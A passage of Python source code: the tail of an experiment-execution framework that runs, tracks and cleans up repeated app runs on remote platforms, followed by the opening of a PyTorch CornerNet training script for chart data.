"deleted remote data directory"
)
driver.disconnect()
self.logger.info(f"{env}->{zone}: disconnected")
def execute(
self, *, env_phase_mapping: t.Optional[t.Dict[str, t.List[str]]] = None, resume=False
) -> None:
"""Execute the Experiment on a target platform
Preconditions:
- The experiment should be configured and bootstrapped.
- Drivers should be available and should be able to connect.
- Each run should be digested.
"""
if env_phase_mapping:
if not isinstance(env_phase_mapping, t.Dict):
raise TypeError("env_phase_mapping must be a dict")
for env, phases in env_phase_mapping.items():
if not isinstance(env, str) or env not in self.config.ENVIRONMENTS:
raise ValueError(f"invalid env in env_phase_mapping: {env}")
if not isinstance(phases, t.List):
raise TypeError(f"invalid value type in env_phase_mapping: {type(phases)}")
invalid_phases = [_ for _ in phases if _ not in self.phases]
if invalid_phases:
raise ValueError(f"invalid phases for env {env!r}: {invalid_phases}")
for env in self.config.ENVIRONMENTS:
self._validate_execute(env)
try:
phases = env_phase_mapping[env] if env_phase_mapping else list(self.phases)
self.execute_in_environment(env, phases=phases, resume=resume)
except (KeyboardInterrupt, SystemExit, Exception) as e:
exc = traceback.format_exception(type(e), e, e.__traceback__)
self.logger.critical(
f"execution failed for environment {env} with exception: {exc}"
)
raise ExperimentExecutionFailed(exc)
"""
Run
----------
Base class for experiment runs.
"""
class Run(
Pickleable,
Configurable,
HasParent,
IntermediatesHandler,
parent=Experiment,
metaclass=abc.ABCMeta,
):
def __init__(self, *args: t.Any, **kwargs: t.Any) -> None:
"""Initialise a Run
Args:
*args (t.Any): Passed to parent initialisers
**kwargs (t.Any): Passed to parent initialisers
Raises:
ExperimentRuntimeError: If not configured or doesn't have a parent
"""
Configurable.__init__(self, *args, **kwargs)
HasParent.__init__(self, *args, **kwargs)
if not self.configured or not self.parent:
raise ExperimentRuntimeError(
"Run instances are expected to be instantiated completely "
"with config and parent"
)
self.logger = self.parent.logger.getChild("Run")
self._runtime_config = dict()
if "repetitions" not in self.config:
raise ExperimentRuntimeError(
"All run instances and subclasses require a 'repetitions' config."
)
self._execution_status = {
env: {rep: False for rep in range(self.config.repetitions)}
for env in self.parent.config.ENVIRONMENTS
}
def _length_helper(self, length: t.Optional[int]) -> int:
"""Check if length type/value or get configured length
Args:
length (t.Optional[int]): The length
"""
pass
def _configure_layers_proxy(self, which: str, **kwargs) -> None:
"""Configure runtime-configurable layers
Layers are configured with own config (phase, length_seconds, frequency), and
optionally with values in kwargs. The layer keys must match (e.g. 'io', 'src')!
Since the config contains only the frequency, the bit rate is added too.
Args:
which (str): "encode" or "decode"
**kwargs: keyword arguments to pass to the parent Experiment configurator,
keys should correspond to layer names (e.g. 'lne', 'io')
"""
pass
@property
def execution_status(self) -> dict:
"""Gets the execution status of the Run
The Run's execution status has the form:
{
<env name>: {
<rep idx>: True | False,
...
},
...
}
Returns:
dict: The execution status
"""
return getattr(self, "_execution_status", self.infer_execution_status())
def infer_execution_status(self, *, update: bool = True) -> dict:
"""Infers the execution status from the contained files
Returns:
dict: The inferred execution status
Args:
update (bool, optional): Update the Run's own execution status?
Raises:
TypeError: Wrong type provided to 'update'
"""
if not isinstance(update, bool):
raise TypeError(f"'update' must be a {bool}, got: {type(update)}")
envs = list(self.parent.config.ENVIRONMENTS)
status = dict.fromkeys(envs)
for env in envs:
logs = self.env_path(env).glob("*/*.log.csv")
reps = sorted(set([log_path_unformatter(log)[1] for log in logs]))
total_reps = list(range(self.config.repetitions))
status[env] = {rep: (rep in reps) for rep in total_reps}
if update:
self._execution_status = status
return status
@property
def runtime_config(self) -> dict:
"""Get the last used runtime_config."""
return getattr(self, "_runtime_config", dict())
@runtime_config.setter
def runtime_config(self, value) -> None:
"""Set the rt config"""
if not isinstance(value, dict):
raise TypeError("'value' should be a dict-type", value)
setattr(self, "_runtime_config", cp.deepcopy(value))
def __repr__(self) -> str:
_ = ""
_ += "ingested, " if self.ingested else ""
_ += "digested, " if self.digested else ""
return f"<Run at {hex(id(self))} ({_}config={self.config})>"
@classmethod
def read(cls, path: Path, parent: t.Optional[object] = None) -> object:
"""Read a serialised Run and produce a Run instance
Args:
path (Path): The path of the serialised instance
parent (t.Optional[object], optional): The parent experiment to set
Returns:
object: The deserialised instance
"""
instance = cls.deserialise(path)
get_root_logger().debug(f"unpicked a run instance {instance}")
if parent:
instance.parent = parent
return instance
def _write_custom_schedules(self) -> t.List[Path]:
"""Write all custom schedules to the run path
Returns:
t.List[Path]: A list with copied schedules
Raises:
MisconfiguredError: If a provided file does not exist
"""
apps_with_schedules = {}
copied_schedules = []
for app in [v["APPS"] for v in self.parent.config.ENVIRONMENTS.values()]:
for k, v in {k: v for k, v in app.items() if "sched" in v}.items():
apps_with_schedules.update({k: v})
for app_name, app in apps_with_schedules.items():
sched_path = Path(app["sched"])
if not sched_path.exists():
raise MisconfiguredError(
f"The custom schedule file {sched_path} for app {app_name!r} does not exist!"
)
new_path = self.path / sched_path.name
copied_schedules.append(copy(sched_path, new_path, replace=True))
return copied_schedules
def write(self) -> None:
"""Serialise a Run instance"""
file_to_write = "_run.pickle"
path = Path.joinpath(self.path, file_to_write)
self.path.mkdir(parents=True, exist_ok=True)
self.serialise(path)
self.logger.debug(f"serialised run to '{path}'")
with (self.path / "_config.toml").open("w") as _:
toml.dump(self.config, _)
written_schedules = self._write_custom_schedules()
self.logger.debug(f"wrote custom schedules: {[str(_) for _ in written_schedules]}")
@property
@abc.abstractmethod
def identifier(self) -> str:
"""Get the save path"""
pass
@property
def path(self) -> Path:
formatted_directory = run_path_formatter(self.config.phase, self.identifier)
return Path.joinpath(self.parent.path, formatted_directory)
def env_path(self, env: str, *, relative: bool = False) -> Path:
"""Get a specific environment's path"""
assert isinstance(env, str)
assert env in self.parent.config.ENVIRONMENTS, "env in config.ENVIRONMENTS"
assert env in self.parent.environments, "env in environments"
if relative:
return (self.path / env).relative_to(self.parent.save_path)
else:
return self.path / env
def rep_path(self, env: str, rep: int, *, relative: bool = False) -> Path:
assert isinstance(rep, int), f"Wrong type for rep, should be int but is {type(rep)}"
assert (
rep < self.config.repetitions
), f"rep out of range, has to be small than {self.config.repetitions}"
return self.env_path(env, relative=relative).joinpath(repetition_formatter(rep))
def remote_path(self, env: str, zone: str) -> Path:
"""Get a remote path given an environment and a zone"""
assert isinstance(env, str)
assert isinstance(zone, str)
assert env in self.parent.config.ENVIRONMENTS, "env in config.ENVIRONMENTS"
assert env in self.parent.environments, "env in environments"
assert zone in self.parent.environments[env], "zone in env"
return self.parent.environments[env][zone].path_data / self.path.relative_to(
self.parent.save_path
)
def remote_env_path(self, env: str, zone: str) -> Path:
"""Get a remote environment path given an environment and an zone"""
return self.remote_path(env, zone) / env
def remote_rep_path(self, env: str, zone: str, rep: int) -> Path:
return self.remote_env_path(env, zone) / repetition_formatter(rep)
@property
def drivers_proxy(self) -> t.Mapping[str, Driver]:
"""Get a proxy to the Experiment's drivers for a specific environment
Returns:
t.Mapping[str, Driver]: A mapping: zone: str -> driver: Driver
"""
return getattr(self, "_drivers_proxy", {})
@drivers_proxy.setter
def drivers_proxy(self, value: t.Mapping[str, Driver]) -> None:
"""Set a proxy to the Experiment's drivers for a specific environment
Args:
value (t.Mapping[str, Driver]): A mapping: zone: str -> driver: Driver
"""
assert isinstance(value, t.Mapping), "must be a Mapping"
assert all(isinstance(_, Driver) for _ in value.values()), "must be Drivers"
self._drivers_proxy = value
@property
def ingested(self) -> bool:
"""Has the run performed all decoding steps?"""
return all(
(_ is not None and len(_ if _ is not None else [])) for _ in self.i_streams.values()
)
def clear_ingest(self) -> None:
"""Has the run performed all decoding steps?"""
for stream in self.i_streams:
setattr(self, "i_" + stream, None)
@property
def path_ingestion_data(self) -> Path:
_filepath = self.path
for elem in self.ingestion_tag:
_filepath = _filepath / elem
return _filepath
def load_ingestion_data(
self, prefix: t.Optional[str] = "", bundled: bool = False, **kwargs
) -> None:
self.clear_ingest()
self._configure_layers_proxy("decode", **kwargs)
self.update_ingestion_tag()
self.intermediates = AttributeDict()
if bundled:
i_streams = self.load_mapping_bundled(
path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
else:
i_streams = self.load_mapping(
path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
for stream in i_streams:
setattr(self, "i_" + stream, i_streams[stream])
self.intermediates = self.load_mapping(
path=self.path_ingestion_data, prefix=prefix + "im_"
)
if not self.ingested:
raise Exception("Loading ingestion data failed due to missing data!")
def save_ingestion_data(self, prefix: t.Optional[str] = "", bundled: bool = False) -> None:
if self.ingested:
if bundled:
self.save_mapping_bundled(
"i_streams", path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
self.save_mapping_bundled(
"intermediates", path=self.path_ingestion_data, prefix=prefix + "im_"
)
else:
self.save_mapping(
"i_streams", path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
self.save_mapping(
"intermediates", path=self.path_ingestion_data, prefix=prefix + "im_"
)
else:
get_root_logger().warning("Run not ingested, nothing to be saved!")
def remove_ingestion_data(self, prefix: t.Optional[str] = "") -> None:
self.clear_ingest()
self.intermediates = AttributeDict()
self.remove_mapping(
"i_streams", path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
self.remove_mapping(
"intermediates", path=self.path_ingestion_data, prefix=prefix + "im_"
)
def update_ingestion_tag(self) -> None:
self.ingestion_tag = (
self.parent.layers.io.config.env,
repetition_formatter(self.parent.layers.io.config.rep),
)
@property
def ingestion_tag(self) -> bool:
return getattr(self, "_ingestion_tag", ("", ""))
@ingestion_tag.setter
def ingestion_tag(self, value: tuple) -> None:
if isinstance(value, tuple):
self._ingestion_tag = value
else:
raise TypeError(f"Ingestion Tag has to be of type tuple, but is {type(value)}")
@property
def digested(self) -> bool:
"""Has the run performed all encoding steps?"""
return all(
(_ is not None and len(_ if _ is not None else [])) for _ in self.o_streams.values()
)
@abc.abstractmethod
def digest(self, **kwargs) -> None:
"""Perform all encoding steps"""
pass
@abc.abstractmethod
def ingest(self, **kwargs) -> None:
"""Perform all decoding steps"""
pass
def make_random_bitarray(self, length: t.Optional[int] = None) -> bitarray:
"""Generate a random bit array of specified or configured length"""
return bitarray(self.make_random_boolarray(length).tolist())
def make_random_boolarray(self, length: t.Optional[int] = None) -> np.ndarray:
"""Generate a random bool NumPy array of specified or configured length"""
return np.random.randint(0, 2, self._length_helper(length), dtype=np.dtype("bool"))
def make_random_intarray(self, length: t.Optional[int] = None) -> np.ndarray:
"""Generate a random bool NumPy array of specified or configured length"""
return np.random.randint(0, 2, self._length_helper(length), dtype=np.dtype("int"))
def make_alternating_boolarray(self, length: t.Optional[int] = None) -> np.ndarray:
"""Generate an alternating NumPy bool array of specified or configured length"""
return np.resize([True, False], self._length_helper(length))
def make_alternating_intarray(self, length: t.Optional[int] = None) -> np.ndarray:
"""Generate an alternating binary NumPy int array of specified or configured length"""
return np.resize([1, 0], self._length_helper(length))
def make_alternating_bitarray(self, length: t.Optional[int] = None) -> bitarray:
"""Generate an alternating bit array of specified or configured length"""
return bitarray(self.make_alternating_boolarray(length).tolist())
def make_constant_boolarray(
self, value: bool, length: t.Optional[int] = None
) -> np.ndarray:
"""Generate an constant NumPy bool array of specified or configured length"""
assert isinstance(value, bool), "Value must be a boolean"
return np.resize([value], self._length_helper(length))
def make_constant_intarray(self, value: int, length: t.Optional[int] = None) -> np.ndarray:
"""Generate an constant binary NumPy int array of specified or configured length"""
assert isinstance(value, int) and value in [0, 1], "Value must be either 1 or 0"
return np.resize([value], self._length_helper(length))
def make_constant_bitarray(self, value: bool, length: t.Optional[int] = None) -> bitarray:
"""Generate an constant bit array of specified or configured length"""
return bitarray(self.make_constant_boolarray(value, length).tolist())
def make_repeated_intarray(
self, base: np.ndarray, length: t.Optional[int] = None
) -> np.ndarray:
"""Generate a NumPy int array of specified or configured length with a repeated pattern
Args:
base (np.ndarray): The base for the repeated pattern
length (t.Optional[int], optional): The length
Returns:
np.ndarray: The generated array
"""
return np.resize(base, self._length_helper(length))
def _bootstrap_apps(self, env: str, rep: int) -> t.Mapping:
"""Bootstrap apps for the experiment
Args:
env (str): The environment name in which the app is to be executed
rep (int): The repetition number
Returns:
t.Mapping: A mapping with apps as keys, and values of:
- executable
- zone
- config
- runtime arguments
Raises:
ExperimentRuntimeError: If an application was not executable
"""
apps = self.parent.environments_apps_zones[env].copy()
for app in apps:
self.logger.debug(f"bootstrapping app {app!r} in env: {env!r}, run: {self}")
_e_z = "{}->{}".format(env, apps[app].zone)
_driver = self.drivers_proxy[apps[app].zone]
# Common values
sched = (
apps[app]["sched"]
if apps[app]["sched"] and app != "src"
else apps[app]["zone_config"]["schedule_tag"] + ".sched"
)
apps[app].sched = sched
apps[app].process = None
apps[app].duration = self.estimated_duration()
if apps[app].is_android:
apps[app].intent = None
# Standalone apps
if apps[app].standalone:
if not _driver.executable_exists(apps[app].executable):
raise ExperimentRuntimeError(
"{}: app {!r} standalone executable {!r} not valid".format(
_e_z, app, apps[app].executable
)
)
if apps[app].is_unix:
# Save stdout and stderr
apps[app].args += [
"1>{}".format(
str(
self.remote_rep_path(env, apps[app].zone, rep)
/ generic_log_formatter(app, dbg=False)
)
),
"2>{}".format(
str(
self.remote_rep_path(env, apps[app].zone, rep)
/ generic_log_formatter(app, dbg=True)
)
),
]
if apps[app].is_android and apps[app].app_config:
self.logger.debug(
"standalone android app has config, transforming into an Intent"
)
apps[app].intent = Intent(**apps[app].app_config.as_dict())
apps[app].intent.es.update(
{
"filename": str(
self.remote_path(env, apps[app].zone) / apps[app].sched
)
}
)
cfg = apps[app].app_config.as_dict()
filename = app_configfile_formatter(app)
with self.rep_path(env, rep).joinpath(filename).open("w") as file:
json.dump(cfg, file, indent=2)
self.logger.debug(f"bootstrapped standalone app {app!r}")
continue
# Framework apps
# On Unix, prepend the path to executables.
if apps[app].is_unix:
apps[app].executable = str(
Path(apps[app]["zone_config"]["path_apps"]) / apps[app].executable
)
if not _driver.executable_exists(apps[app].executable):
raise ExperimentRuntimeError(
"{}: app {!r} executable {!r} not available or executable on target".format(
_e_z, app, apps[app].executable
)
)
# These keys are needed by default. Will be added if not already preset.
apps[app].app_config["meter"] = apps[app].app_config.get("meter", dict())
apps[app].app_config["logging"] = apps[app].app_config.get("logging", dict())
apps[app].app_config["schedule_reader"] = apps[app].app_config.get(
"schedule_reader", dict()
)
apps[app].app_config["meter"]["period"] = self.parent.environment_config_general(
env
).sampling_period
apps[app].app_config["logging"]["app_log_filename"] = str(
self.remote_rep_path(env, apps[app].zone, rep)
/ app_log_formatter(app, dbg=False)
)
apps[app].app_config["logging"]["debug_log_filename"] = str(
self.remote_rep_path(env, apps[app].zone, rep)
/ app_log_formatter(app, dbg=True)
)
if sched:
apps[app].app_config["schedule_reader"]["input_file"] = str(
self.remote_path(env, apps[app].zone) / sched
)
apps[app].app_config["schedule_reader"]["reading_from_file"] = True
else:
apps[app].app_config["schedule_reader"]["reading_from_file"] = False
self.logger.warning(f"App {app!r} does not have a schedule file?")
cfg = apps[app].app_config.as_dict()
filename = app_configfile_formatter(app)
with self.rep_path(env, rep).joinpath(filename).open("w") as file:
json.dump(cfg, file, indent=2)
apps[app].json = json.dumps(cfg)
apps[app].args = ["--json_string", json.dumps(cfg)]
self.logger.debug(f"bootstrapped local app {app!r}")
return apps
def execute(self, env: str, resume=False) -> None:
"""Execute a single Run in an environment
Args:
env (str): An environment name
"""
active_wait = (
True
if "active_wait" not in self.parent.environment_config_general(env)
else self.parent.environment_config_general(env).active_wait
)
# If resuming, pick repetitions that have not been executed
reps = [
rep
for rep, executed in self.execution_status[env].items()
if ((not executed) if resume else True)
]
self.logger.info(
f"executing in env: {env!r}, resume: {resume}, reps: {reps!r}, run: {self!r}"
)
for rep in reps:
self.rep_path(env, rep).mkdir(parents=True, exist_ok=True)
for zone, driver in self.drivers_proxy.items():
driver.mkdir(str(self.remote_rep_path(env, zone, rep)), parents=True)
self.logger.info(
f"executing in env: {env}, rep: {rep}, estimated duration: "
f"{self.estimated_duration()}s, run: {self!r}"
)
apps = self._bootstrap_apps(env, rep)
if not all(
[
"src" in apps,
"snk" in apps if "Exploratory" not in type(self).__name__ else True,
]
):
raise ExperimentRuntimeError("apps must at least have a 'src' and 'snk'")
master_processes = {zone: [] for zone in self.drivers_proxy}
slave_processes = {zone: [] for zone in self.drivers_proxy}
auxiliary_processes = {zone: [] for zone in self.drivers_proxy}
standalone_processes = {zone: [] for zone in self.drivers_proxy}
start_threads = []
barrier = threading.Barrier(1 + len(self.drivers_proxy))
try:
# 0. Init state
if "src" in apps:
self.drivers_proxy[apps["src"].zone].initstate()
else:
self.drivers_proxy[list(self.drivers_proxy)[0]].initstate()
# 1. Launch non-src apps with start_individually != True
for app in [
_
for _ in apps
if _ != "src" and not apps[_].get("start_individually", False)
]:
apps[app].process, _ = self.drivers_proxy[apps[app].zone].spawn(
apps[app].executable, apps[app].args, details=apps[app]
)
slave_processes[apps[app].zone].append(apps[app].process)
# NOTE specific to persistent
if apps[app].process.exited is not None:
self.logger.error(
f"{app!r} executable exited prematurely ({apps[app].process.exited}), stderr: {_.stderr}"
)
raise ExperimentRuntimeError(f"{app!r} executable exited prematurely")
else:
self.logger.debug(
f"spawned a {app!r} executable: {apps[app].process!r}"
)
# 2. Launch the src app and add other apps as slaves
apps["src"].process, _ = self.drivers_proxy[apps["src"].zone].spawn(
apps["src"].executable,
apps["src"].args,
slaves=slave_processes[apps["src"].zone],
details=apps["src"],
)
master_processes[apps["src"].zone].append(apps["src"].process)
if apps["src"].process.exited is not None:
self.logger.error(
f"'src' executable exited prematurely ({apps[app].process.exited}), stderr: {_.stderr}"
)
raise ExperimentRuntimeError(f"'src' executable exited prematurely")
else:
self.logger.debug(f"spawned a 'src' executable: {apps['src'].process!r}")
# 3. Delay between spawn & start
sleep_amount = (
1.0
if "delay_after_spawn" not in self.parent.environment_config_general(env)
else self.parent.environment_config_general(env).delay_after_spawn
)
self.logger.debug(f"sleeping after spawning regular apps for {sleep_amount}s")
sleep(sleep_amount)
# 4. Start auxiliary apps with start_individually == True
for app in [_ for _ in apps if apps[_].get("start_individually", False)]:
apps[app].process, _ = self.drivers_proxy[apps[app].zone].spawn(
apps[app].executable, apps[app].args, details=apps[app]
)
auxiliary_processes[apps[app].zone].append(apps[app].process)
if apps[app].process.exited is not None:
self.logger.error(
f"auxiliary executable {app!r} exited prematurely ({apps[app].process.exited}), "
f"stderr: {_.stderr}"
)
raise ExperimentRuntimeError(f"{app!r} executable exited prematurely")
else:
self.logger.debug(
f"spawned an auxiliary executable {app!r}, id: {apps[app].process!r}"
)
sleep_amount = (
1.0
if "delay_after_auxiliary"
not in self.parent.environment_config_general(env)
else self.parent.environment_config_general(env).delay_after_auxiliary
)
self.logger.debug(f"sleeping after spawning auxiliary apps for {sleep_amount}s")
sleep(sleep_amount)
# 5. Start apps
start_pgroup = {zone: [] for zone in self.drivers_proxy}
start_before_pgroup = {zone: [] for zone in self.drivers_proxy}
for zone in start_pgroup:
start_pgroup[zone] += slave_processes[zone] + master_processes[zone]
# filder processes that are not meant to be started with the starter below
start_pgroup[zone] = [
_ for _ in start_pgroup[zone] if _ not in standalone_processes[zone]
]
start_before_pgroup[zone] = [
_ for _ in slave_processes[zone] if _ not in standalone_processes[zone]
]
stagger = (
self.parent.environment_config_general(env)
if "stagger" in self.parent.environment_config_general(env)
else True
)
# Should start staggered?
if stagger:
def starter(_zone, _driver, _start_pgroup, _start_before_pgroup, _barrier):
self.logger.debug(f"waiting on barrier for zone {_zone}")
_barrier.wait()
if _start_before_pgroup:
_driver.start(*_start_before_pgroup)
if _start_pgroup:
_driver.start(*_start_pgroup)
for zone, driver in self.drivers_proxy.items():
self.logger.debug(
f"will start staggered in zone {zone!r}, "
f"first processes: {start_before_pgroup[zone]!r}, "
f"then processes: {master_processes[zone]!r}"
)
start_threads.append(
threading.Thread(
target=starter,
args=(
zone,
driver,
master_processes[zone],
start_before_pgroup[zone],
barrier,
),
)
)
else:
def starter(_zone, _driver, _processes, _barrier):
self.logger.debug(f"waiting on barrier for zone {_zone}")
_barrier.wait()
if _processes:
_driver.start(*_processes)
for zone, driver in self.drivers_proxy.items():
self.logger.debug(
f"will start simultaneously in zone {zone!r}, processes: {start_pgroup[zone]!r}"
)
start_threads.append(
threading.Thread(
target=starter, args=(zone, driver, start_pgroup[zone], barrier)
)
)
for thread in start_threads:
thread.start()
self.logger.debug(f"waiting on barrier for starting threads")
barrier.wait()
self.logger.debug(f"passed barrier for starting threads")
for thread in start_threads:
thread.join()
for zone in start_pgroup:
self.logger.debug(
f"started processes: {start_pgroup[zone]} in zone: {zone}"
)
if not active_wait:
for zone, driver in self.drivers_proxy.items():
self.logger.debug(f"disconnecting driver for zone {zone!r}")
driver.backend.disconnect()
# 6. Wait for SRC to complete
timeout_duration = (
10 * self.estimated_duration()
if "timeout_duration" not in self.parent.environment_config_general(env)
else self.parent.environment_config_general(env).timeout_duration
)
timeout_duration = max(timeout_duration, 3.0)
sleep_wait_for_src = max(1.5 * self.estimated_duration(), 1.0)
with Timeout(timeout_duration, throwing=False) as timeout:
# Inactive wait:
if not active_wait:
total_waited = 0.0
while True:
sleep(sleep_wait_for_src)
for zone, driver in self.drivers_proxy.items():
if not driver.backend.connected:
self.logger.debug(f"reconnecting driver for zone {zone!r}")
driver.backend.connect()
if apps["src"].process.exited is not None:
break
else:
total_waited += sleep_wait_for_src
self.logger.debug(
f"src app did not exit after {total_waited} sleep time "
f"in zone {zone!r}"
)
_ = 0.5 * sleep_wait_for_src
__ = 0.1 * self.estimated_duration()
sleep_wait_for_src = max(max(_, __), __)
else:
# Active wait:
self.drivers_proxy[apps["src"].zone].wait(
apps["src"].process,
refresh_period=max(0.275 * self.estimated_duration(), 1.0),
)
# 7. Check exit status of 'src' app, stop & kill.
if timeout.timed_out or apps["src"].process.exited is None:
self.logger.error(
f"'src' executable timed out after {timeout_duration} seconds, "
"will be terminated"
if timeout.timed_out
else f"'src' executable failed or timed out"
)
# Stop, then kill the 'src' app.
self.drivers_proxy[apps["src"].zone].stop(apps["src"].process)
sleep(0.25)
self.drivers_proxy[apps["src"].zone].kill(apps["src"].process)
if apps["src"].process.exited != 0:
self.logger.error(
f"'src' executable exited with non-zero return code "
f"({apps['src'].process.exited!r})"
)
else:
self.logger.debug("'src' executable exited successfully!")
# 8. Check exit statuses and explicitly kill apps
for app in [_ for _ in apps if _ != "src"]:
self.drivers_proxy[apps[app].zone].stop(apps[app].process)
sleep(0.25)
if apps[app].process.exited != 0:
self.logger.error(
f"app {app!r} executable exited with non-zero return code "
f"({apps[app].process.exited!r})"
)
else:
self.logger.debug(f"{app!r} executable exited successfully!")
break
if apps[app].process.exited is None:
self.logger.warning(f"app {app!r} did not exit gracefully!")
# 9. Update execution state for rep to True if no exception was fired
self._execution_status[env][rep] = True
except (KeyboardInterrupt, SystemExit):
self.logger.critical(f"interrupted repetition {rep} in env: {env!r}")
raise
except ExperimentRuntimeError as e:
self.logger.error(f"runtime error in repetition {rep} in env: {env!r}: {e}")
continue
finally:
# 10. Kill all processes
self.logger.debug("shutting down any remaining apps")
for zone, driver in self.drivers_proxy.items():
all_processes = [
*master_processes[zone],
*slave_processes[zone],
*auxiliary_processes[zone],
]
self.logger.debug(f"killing all_processes: {all_processes!r}")
driver.kill(*all_processes)
def send(self, env):
previous_id = None
previous_wd = None
for zone, driver in self.parent.drivers[env].items():
# if drivers connect to zones that have the same IP/serial address, the next driver
# must force connection, because the first driver to connect will lock the platform...
current_id = driver.connection_id
if not driver.connected:
driver.connect(force=current_id == previous_id) # gets original settings
current_wd = driver.working_directory
self.parent.logger.info(f"{env}->{zone}: connected: {driver.__class__.__name__}")
self.parent.logger.debug(
f"{env}->{zone}: original state: {driver.original_state!r}"
)
self.parent.logger.debug(
f"{env}->{zone}: curr_id: {current_id}, prev_id: {previous_id}"
)
self.parent.logger.debug(
f"{env}->{zone}: curr_wd: {current_wd}, prev_wd: {previous_wd}"
)
if current_id == previous_id and current_wd == previous_wd:
self.parent.logger.debug(
f"{env}->{zone}: experiment already sent, ids and working directories were "
f"the same in the previous driver ({previous_id}->{previous_wd!r})"
)
else:
self.parent.logger.info(f"{env}->{zone}: sending experiment")
if driver.exists(str(self.parent.remote_path(env, zone))):
self.parent.logger.debug(
f"{env}->{zone}: remote experiment directory exists, will be deleted"
)
_ = driver.delete(str(self.parent.remote_path(env, zone)), recursive=True)
if _:
self.parent.logger.debug(
f"{env}->{zone}: deleted successfully: {self.parent.remote_path(env, zone)!s}"
)
else:
self.parent.logger.debug(
f"{env}->{zone}: failed to delete: {self.parent.remote_path(env, zone)!s}"
)
with Timeout(60, throwing=False) as timeout:
_ = driver.send(
path_from=self.path,
path_to=Path.joinpath(
self.parent.remote_path(env, zone),
self.path.relative_to(self.parent.path),
),
)
if not _.ok:
_msg = f"{env}->{zone}: failed to send: {_.stderr}"
self.parent.logger.critical(_msg)
raise ExperimentRuntimeError(_msg)
else:
self.parent.logger.info(f"{env}->{zone}: experiment sent!")
if timeout.timed_out:
driver.disconnect()
raise ExperimentRuntimeError(
f"{env}->{zone}: Timed out after 30s during experiment sending"
)
previous_id = cp.copy(current_id)
previous_wd = cp.copy(current_wd)
def fetch_and_cleanup(self, env):
previous_id = None
previous_wd = None
for zone, driver in self.parent.drivers[env].items():
current_id = driver.connection_id
current_wd = driver.working_directory
if current_id == previous_id and current_wd == previous_wd:
self.parent.logger.debug(
f"{env}->{zone}: skipping fetching due to same id and working directory "
f"in the previous driver ({previous_id}->{previous_wd})"
)
else:
fetch_result = driver.fetch(
path_from=Path.joinpath(
self.parent.remote_path(env, zone),
self.path.relative_to(self.parent.path),
),
path_to=self.path,
)
if not fetch_result.ok:
_msg = f"{env}->{zone}: failed to fetch logs: {fetch_result.stderr}"
self.parent.logger.critical(_msg)
else:
self.parent.logger.info(f"{env}->{zone}: experiment logs fetched!")
driver.delete(
path=str(
Path.joinpath(
self.parent.remote_path(env, zone),
self.path.relative_to(self.parent.path),
)
),
recursive=True,
)
previous_id = cp.copy(current_id)
previous_wd = cp.copy(current_wd)
def estimated_duration(self, env=None) -> t.Optional[float]:
"""Get the estimated duration of this Run's execution
Returns:
t.Optional[float]: the duration in seconds, or None if not digested
"""
raise Exception(NotImplemented)
|
train_chart.py
|
#!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
from socket import error as SocketError
import errno
import re
from tqdm import tqdm
from utils import stdout_to_tqdm
from config import system_configs
from nnet.py_factory import NetworkFactory
from azureml.core.run import Run
from torch.multiprocessing import Process, Queue, Pool
from db.datasets import datasets
import time
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CornerNet")
parser.add_argument("--cfg_file", dest="cfg_file", help="config file", default="CornerNetLineClsReal", type=str)
# parser.add_argument("--cfg_file", dest="cfg_file", help="config file", default="CornerNetPureBar", type=str)
parser.add_argument("--iter", dest="start_iter", help="train at iteration i", default=0, type=int)
parser.add_argument("--threads", dest="threads", default=1, type=int)
parser.add_argument('--cache_path', dest="cache_path",default="./data/cache/", type=str)
parser.add_argument("--data_dir", dest="data_dir", default="./data/linedata(1028)", type=str)
args = parser.parse_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
print('We met some errors!')
traceback.print_exc()
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
try:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
except SocketError as e:
if e.errno != errno.ECONNRESET:
raise
pass
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0):
learning_rate = system_configs.learning_rate
max_iteration = system_configs.max_iter
pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
val_ind = 0
print("building model...")
nnet = NetworkFactory(training_dbs[0])
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(32)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(32)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
training_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
run = Run.get_context()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
if start_iter == -1:
print("training starts from the latest iteration")
save_list = os.listdir(system_configs.snapshot_dir)
save_list.sort(reverse=True)
if len(save_list) > 0:
target_save = save_list[0]
start_iter = int(re.findall(r'\d+', target_save)[0])
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
else:
start_iter = 0
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
if not os.path.exists('./outputs'):
os.makedirs('./outputs')
